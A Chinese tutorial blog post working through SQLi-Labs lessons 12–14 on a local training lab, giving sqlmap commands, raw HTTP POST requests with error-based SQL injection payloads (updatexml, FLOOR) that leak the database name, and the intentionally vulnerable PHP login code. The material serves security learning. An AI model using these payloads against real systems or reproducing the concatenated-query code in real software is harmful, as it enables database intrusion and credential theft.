zoukankan      html  css  js  c++  java
  • 【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2【12-14】

        这几关主要是考察POST形式的SQLi注入闭合

    ## Less-12 - POST - Error Based- Double quotes- String

    ### 1)知识点

        主要考察报错注入中的双引号闭合注入情况。

    ### 2)工具用法:

    SQLMAP POST注入用法之一,注入点处加 * 号,也可以用-r选项。
    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-12/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

    ### 3)手工注入

    POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 98
     
    uname=111") UNION ALL SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

    ### 4)注入点代码

    // take the variables
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
     
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."
    ");
    fwrite($fp,'Password:'.$passwd."
    ");
    fclose($fp);
     
     
    // connectivity
    $uname='"'.$uname.'"';   //双引号闭合
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    ## Less-13- Double Injection- String- with twist

    ### 1)知识点

        主要考察报错注入中的单引号+括号闭合注入情况。

    ### 2)工具用法:

    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

    ### 3)手工注入

    POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 93
     
    uname=111') union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

    或者使用FLOOR报错

    uname=-2672') OR 1 GROUP BY CONCAT(0x7E,(SELECT DATABASE()),0x7E,FLOOR(RAND(0)*2)) HAVING MIN(0)#&passwd=11&submit=Submit

    ### 4)注入点产生代码

    // take the variables
    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
     
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."
    ");
    fwrite($fp,'Password:'.$passwd."
    ");
    fclose($fp);
     
     
    // connectivity
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    ## Less-14- Double Injection- Double quotes- String

    ### 1)工具用法:

    sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

    ### 2)手工注入

    POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 92
     
    uname=111" union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

    ### 3)注入点产生代码

    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
     
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."
    ");
    fwrite($fp,'Password:'.$passwd."
    ");
    fclose($fp);
     
     
    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
  • 相关阅读:
    iOS中的NSTimer 和 Android 中的Timer
    正则表达式中*的使用小注意
    NSUrlConnection 和 NSUrlRequest 的关系
    iOS 中的第三方库管理工具
    Android 向Application对象添加Activity监听
    Android dp px转化公式
    Android 返回桌面的Intent
    Spring+SpringMVC+Hibernate小案例(实现Spring对Hibernate的事务管理)
    Equinox OSGi应用嵌入Jersey框架搭建REST服务
    在OSGI容器Equinox中嵌入HttpServer
  • 原文地址:https://www.cnblogs.com/17bdw/p/5529025.html
Copyright © 2011-2022 走看看